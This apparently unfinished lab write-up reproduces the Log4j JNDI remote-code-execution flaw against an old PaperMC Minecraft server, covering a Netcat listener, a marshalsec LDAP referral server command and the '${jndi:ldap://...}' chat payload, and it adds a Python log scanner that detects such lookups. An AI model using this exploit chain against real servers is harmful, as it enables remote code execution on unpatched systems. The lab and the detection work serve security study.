# Log4j incident - Practical example
The general idea behind this example is to host a PaperMC Minecraft server in a Windows VM and show how RCE (Remote Code Execution) works via JNDI connections over HTTP and LDAP.
I did not, of course, find this vulnerability or come up with this example myself; it is purely inspired [by a video of John Hammond](https://www.youtube.com/watch?v=7qoPDq41xhQ).
## Setup
The vulnerability was found in Minecraft version 1.18, which uses jdk-8u181, and was already [patched in 1.18.1](https://www.minecraft.net/en-us/article/minecraft-java-edition-1-18-1).
The goal of this practical example is to set up a [PaperMC](https://papermc.io) Minecraft server on a Windows VM and attack it from Kali by opening Netcat connections for JNDI with HTTP and LDAP. Based on this knowledge, we can make use of a simple Java program called ["Java Unmarshaller"](https://github.com/mbechler/marshalsec), which generates payloads for Java RCE.
### Minecraft Server
To set up the Minecraft server we first need to download a PaperMC version in which the Log4j vulnerability is still unpatched. This will be [PaperMC-1.8.8-443](https://api.papermc.io/v2/projects/paper/versions/1.8.8/builds/443/downloads/paper-1.8.8-443.jar). (This version is used because it is the one in the video mentioned above, where the steps to reproduce are clear.)
After that, we create a folder and put the .jar file into it. To use the .jar file we need to create a simple batch script that runs the server JAR with some Java arguments.
```
java -Xms2G -Xmx2G -jar paper-1.8.8-443.jar --nogui
```
This will create new files in the directory; the one that interrupts the server startup phase is a file called "eula.txt". To start the server, we need to change the boolean in that file from ```false``` to ```true```. After that we are clear to start the server and connect to it with our Minecraft client.
## Setup Attacker VM
On the Kali VM we can now set up a Netcat listener for the JNDI connection to connect to. A basic example would be the following:
```
nc -lvnp 9000
```
After that we will make use of an RCE PoC found on [GitHub](https://github.com/xiajun325/apache-log4j-rce-poc), which basically injects code into Apache Webservers, which are also based on Java and use Log4j.
```
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<VM-IP>:8888/#Log4jRCE"
```
An important thing to point out is the ```#Log4jRCE``` fragment in the URL, which will call the Log4jRCE static class of the PoC. We also need to specify the IP and port on which our web server will run, which then "redirects" the requests to the Log4jRCE class. This static class may be used to inject real code (e.g. PowerShell code, which can also be done by encoding it to Base64), but in our case we will stick to opening a normal Windows app like "calc.exe" or "mspaint.exe". The LDAP server started by the command above will also open a listening port, 1389.
All we now need to do is compile the aforementioned Log4jRCE.java file, which will result in a Log4jRCE.class file.
So when we input something like ```${jndi:ldap://<vm-ip>:1389/Log4jRCE}``` into the Minecraft chat on our client, it should execute the command we defined in Log4jRCE.java on the server.
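
Seen from the defender's side, the chat string above ends up in the server log, so that log is the first place to look for attempts and for the callback host and port to check against egress records. The following Python script is an added example, not part of the original write-up or of any project mentioned here; the log line layout, the player names and the address 192.0.2.10 are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumed chat log layout: "[HH:MM:SS] [<thread>/INFO]: <Player> message"
CHAT = re.compile(
    r"^\[(?P<time>[\d:]{8})\] \[[^\]]*/INFO\]: <(?P<player>[^>]+)> (?P<msg>.*)$")
# A plain JNDI lookup: ${jndi:<scheme>://host[:port]/name}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<url>[^}\s]+)\s*\}", re.IGNORECASE)
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

def scan(lines):
    """Return one finding per chat line that contains Log4j lookup syntax."""
    findings = []
    for line in lines:
        chat = CHAT.match(line.rstrip("\n"))
        # Lookup syntax has no business in player chat, so any "${" is flagged.
        if not chat or "${" not in chat["msg"]:
            continue
        finding = {"time": chat["time"], "player": chat["player"],
                   "kind": "lookup-syntax", "scheme": None, "host": None, "port": None}
        hit = JNDI.search(chat["msg"])
        if hit:
            url = urlsplit(hit["url"])
            try:
                port = url.port or DEFAULT_PORTS.get(url.scheme)
            except ValueError:  # malformed or out-of-range port
                port = None
            finding.update(kind="jndi", scheme=url.scheme,
                           host=url.hostname, port=port)
        findings.append(finding)
    return findings

# Constructed sample lines; 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE_LOG = [
    "[18:02:11] [Server thread/INFO]: <alice> anyone want to trade?",
    "[18:02:40] [Server thread/INFO]: <mallory> ${jndi:ldap://192.0.2.10:1389/Log4jRCE}",
    "[18:03:05] [Server thread/INFO]: <mallory> ${date:yyyy}",
    "[18:03:09] [Server thread/INFO]: Saving the game",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A server that still evaluates lookups may log the substituted result instead of the text the player typed, so a clean scan of such a server's log is not proof that nothing was attempted.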
## Steps done
- [x] Set up Windows VM
- [x] Set up Kali VM
- [x] Set up Minecraft Server
- [ ] Set up Java Unmarshaller LDAP Server
- [ ] Set up Log4j RCE PoC